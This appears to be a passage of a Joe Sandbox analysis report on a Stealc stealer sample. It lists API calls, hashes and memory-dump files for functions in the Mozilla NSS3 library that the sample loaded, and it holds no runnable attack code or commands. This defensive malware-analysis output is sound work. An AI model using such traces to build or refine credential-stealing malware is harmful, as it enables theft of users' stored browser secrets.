                                                                                                                                                                            • Opcode Fuzzy Hash: 783339fda9f41b9f45bc85a66f91c5dc9535fb8ccc631f49a125ae00a6219490
                                                                                                                                                                            • Instruction Fuzzy Hash: 7951E6B6D00204ABDB20AF28ED458AA7774BF19358B188930EC18A7B11E731FD64C7E1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2120,Function_00097E60,00000000,?,?,?,?,6C92067D,6C921C60,00000000), ref: 6C8A7C81
                                                                                                                                                                              • Part of subcall function 6C814C70: TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
                                                                                                                                                                              • Part of subcall function 6C814C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
                                                                                                                                                                              • Part of subcall function 6C814C70: PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8A7CA0
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8A7CB4
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8A7CCF
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8A7D04
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8A7D1B
                                                                                                                                                                            • realloc.MOZGLUE(-00000050), ref: 6C8A7D82
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A7DF4
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8A7E0E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2305085145-0
                                                                                                                                                                            • Opcode ID: dcab699591accb660ddd03b5dd5f92a470cb72e0b8d540d7b828fdc0a268e0e0
                                                                                                                                                                            • Instruction ID: 1bf8afdc6bfe9e1be34e371e31a778186a8ef4e606ca63d6862c2a1575a87d9d
                                                                                                                                                                            • Opcode Fuzzy Hash: dcab699591accb660ddd03b5dd5f92a470cb72e0b8d540d7b828fdc0a268e0e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 12514571B091409FDF206F68ED44B657BB1EF52319F354929ED1487B19EB30D962CB80
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D11
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D2A
                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D4A
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D57
                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D97
                                                                                                                                                                            • PR_Lock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814DBA
                                                                                                                                                                            • PR_WaitCondVar.NSS3 ref: 6C814DD4
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814DE6
                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814DEF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3388019835-0
                                                                                                                                                                            • Opcode ID: 7522fda965ffefa784beb7b21c396cba5b0d065f2ca42839e5e1ba90c2aef8f1
                                                                                                                                                                            • Instruction ID: 2ba51c95e4c6dab9cd7fe0f42fd05ade5ab3b4deee25af9a6029efc5baa5d9f3
                                                                                                                                                                            • Opcode Fuzzy Hash: 7522fda965ffefa784beb7b21c396cba5b0d065f2ca42839e5e1ba90c2aef8f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 65418FB1A1C616CFCB20AF79E18455D7BF4BF86318F164A69D89897B00E730D885CBC1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A7CE0
                                                                                                                                                                              • Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7D36
                                                                                                                                                                            • PR_Realloc.NSS3(?,00000080), ref: 6C9A7D6D
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A7D8B
                                                                                                                                                                            • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C9A7DC2
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7DD8
                                                                                                                                                                            • malloc.MOZGLUE(00000080), ref: 6C9A7DF8
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A7E06
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                            • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                            • API String ID: 530461531-3274975309
                                                                                                                                                                            • Opcode ID: cea2b9b0ad1a617cbe78403ea4e179f1198078deb24c557d83c469bc41374a50
                                                                                                                                                                            • Instruction ID: 642230d6f3398f9651d925b5a86df6c6289f8181ea7142dce6558ad3db57b680
                                                                                                                                                                            • Opcode Fuzzy Hash: cea2b9b0ad1a617cbe78403ea4e179f1198078deb24c557d83c469bc41374a50
                                                                                                                                                                            • Instruction Fuzzy Hash: 2741E7B1A00201AFDB04CF68CC81D7B3BBAFF95318B25456DE8198BB55D731E852CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7E37
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C9A7E46
                                                                                                                                                                              • Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
                                                                                                                                                                              • Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
                                                                                                                                                                              • Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
                                                                                                                                                                              • Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0
                                                                                                                                                                            • PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C9A7EAF
                                                                                                                                                                            • PR_ImportFile.NSS3(?), ref: 6C9A7ECF
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A7ED6
                                                                                                                                                                            • PR_ImportTCPSocket.NSS3(?), ref: 6C9A7F01
                                                                                                                                                                            • PR_ImportUDPSocket.NSS3(?,?), ref: 6C9A7F0B
                                                                                                                                                                            • PR_ImportPipe.NSS3(?,?,?), ref: 6C9A7F15
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
                                                                                                                                                                            • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                                                                                                            • API String ID: 2743735569-629032437
                                                                                                                                                                            • Opcode ID: c1a7d2ece403fd7a546189cd2686569a77bc336ce59604caa588a30b3c3fb95a
                                                                                                                                                                            • Instruction ID: 5e09da9a511854c62452e69e4916eec67cb6d07af1a39428e2f0cc39e4dde42b
                                                                                                                                                                            • Opcode Fuzzy Hash: c1a7d2ece403fd7a546189cd2686569a77bc336ce59604caa588a30b3c3fb95a
                                                                                                                                                                            • Instruction Fuzzy Hash: 48312371E041159BEB009BE9C842ABFB7A8EF59348F200925D80597A26E771DD16C792
                                                                                                                                                                            APIs
                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C8DDE64), ref: 6C8DED0C
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8DED22
                                                                                                                                                                              • Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095
                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6C8DED4A
                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6C8DED6B
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C8DED38
                                                                                                                                                                              • Part of subcall function 6C814C70: TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
                                                                                                                                                                              • Part of subcall function 6C814C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
                                                                                                                                                                              • Part of subcall function 6C814C70: PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6C8DED52
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C8DED83
                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6C8DED95
                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6C8DED9D
                                                                                                                                                                              • Part of subcall function 6C8F64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C8F127C,00000000,00000000,00000000), ref: 6C8F650E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                            • String ID: security
                                                                                                                                                                            • API String ID: 3323615905-3315324353
                                                                                                                                                                            • Opcode ID: 22cfed9e503039c991b23cede304caf48a4eaec900332d3528491c5bb0d5af75
                                                                                                                                                                            • Instruction ID: c345589c59aafb9f248c2c2f813f591cd0a8e1e7e280c61a91e752dc05534414
                                                                                                                                                                            • Opcode Fuzzy Hash: 22cfed9e503039c991b23cede304caf48a4eaec900332d3528491c5bb0d5af75
                                                                                                                                                                            • Instruction Fuzzy Hash: FD113B759002046BD7306B2DAE40BBBB2746F5264DF060D34E865A2E80EB31F50987D7
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_LogPrint.NSS3(Aborting,?,6C882357), ref: 6C9A0EB8
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C882357), ref: 6C9A0EC0
                                                                                                                                                                            • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9A0EE6
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_Now.NSS3 ref: 6C9A0A22
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C9A0A35
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C9A0A66
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_GetCurrentThread.NSS3 ref: 6C9A0A70
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C9A0A9D
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C9A0AC8
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_vsmprintf.NSS3(?,?), ref: 6C9A0AE8
                                                                                                                                                                              • Part of subcall function 6C9A09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9A0B19
                                                                                                                                                                              • Part of subcall function 6C9A09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9A0B48
                                                                                                                                                                              • Part of subcall function 6C9A09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9A0C76
                                                                                                                                                                              • Part of subcall function 6C9A09D0: PR_LogFlush.NSS3 ref: 6C9A0C7E
                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9A0EFA
                                                                                                                                                                              • Part of subcall function 6C88AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C88AF0E
                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F16
                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F1C
                                                                                                                                                                            • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F25
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F2B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                            • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                            • API String ID: 3905088656-1374795319
                                                                                                                                                                            • Opcode ID: e9521ae28943a9e9d25e1a3dd6b0cfab6949294d63dc80806c5fff66dd547708
                                                                                                                                                                            • Instruction ID: a368ec48a3ded181abf23940d1b7b242c3f02781748a3e93299439f5672c9d69
                                                                                                                                                                            • Opcode Fuzzy Hash: e9521ae28943a9e9d25e1a3dd6b0cfab6949294d63dc80806c5fff66dd547708
                                                                                                                                                                            • Instruction Fuzzy Hash: C7F0C2B69002147BDF013BA0DC4AC9B3E3DDF9A378F044424FD0956602DA76E96496B3
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6C904DCB
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C904DE1
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C904DFF
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C904E59
                                                                                                                                                                              • Part of subcall function 6C8EFAB0: free.MOZGLUE(?,-00000001,?,?,6C88F673,00000000,00000000), ref: 6C8EFAC7
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9C300C,00000000), ref: 6C904EB8
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6C904EFF
                                                                                                                                                                            • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C904F56
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C90521A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1025791883-0
                                                                                                                                                                            • Opcode ID: 7b2e74e7522a6c7e7cb0f0f16d0e42c7f1f78878c2985953907b3f7634187de8
                                                                                                                                                                            • Instruction ID: e9e4785637d4949f9c7c9960f0708c1be9e89124d645b23c48d5527138a1e9c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b2e74e7522a6c7e7cb0f0f16d0e42c7f1f78878c2985953907b3f7634187de8
                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF17A71F00209CBDB04CF58D8406AEB7B6BF49358F25816DE915AB781EB75E982CF90
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(6C902C2A), ref: 6C900C81
                                                                                                                                                                              • Part of subcall function 6C8EBE30: SECOID_FindOID_Util.NSS3(6C8A311B,00000000,?,6C8A311B,?), ref: 6C8EBE44
                                                                                                                                                                              • Part of subcall function 6C8D8500: SECOID_GetAlgorithmTag_Util.NSS3(6C8D95DC,00000000,00000000,00000000,?,6C8D95DC,00000000,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8D8517
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C900CC4
                                                                                                                                                                              • Part of subcall function 6C8EFAB0: free.MOZGLUE(?,-00000001,?,?,6C88F673,00000000,00000000), ref: 6C8EFAC7
                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C900CD5
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C900D1D
                                                                                                                                                                            • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C900D3B
                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C900D7D
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C900DB5
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C900DC1
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C900DF7
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C900E05
                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C900E0F
                                                                                                                                                                              • Part of subcall function 6C8D95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8D95E0
                                                                                                                                                                              • Part of subcall function 6C8D95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8D95F5
                                                                                                                                                                              • Part of subcall function 6C8D95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C8D9609
                                                                                                                                                                              • Part of subcall function 6C8D95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8D961D
                                                                                                                                                                              • Part of subcall function 6C8D95C0: PK11_GetInternalSlot.NSS3 ref: 6C8D970B
                                                                                                                                                                              • Part of subcall function 6C8D95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8D9756
                                                                                                                                                                              • Part of subcall function 6C8D95C0: PK11_GetIVLength.NSS3(?), ref: 6C8D9767
                                                                                                                                                                              • Part of subcall function 6C8D95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C8D977E
                                                                                                                                                                              • Part of subcall function 6C8D95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8D978E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
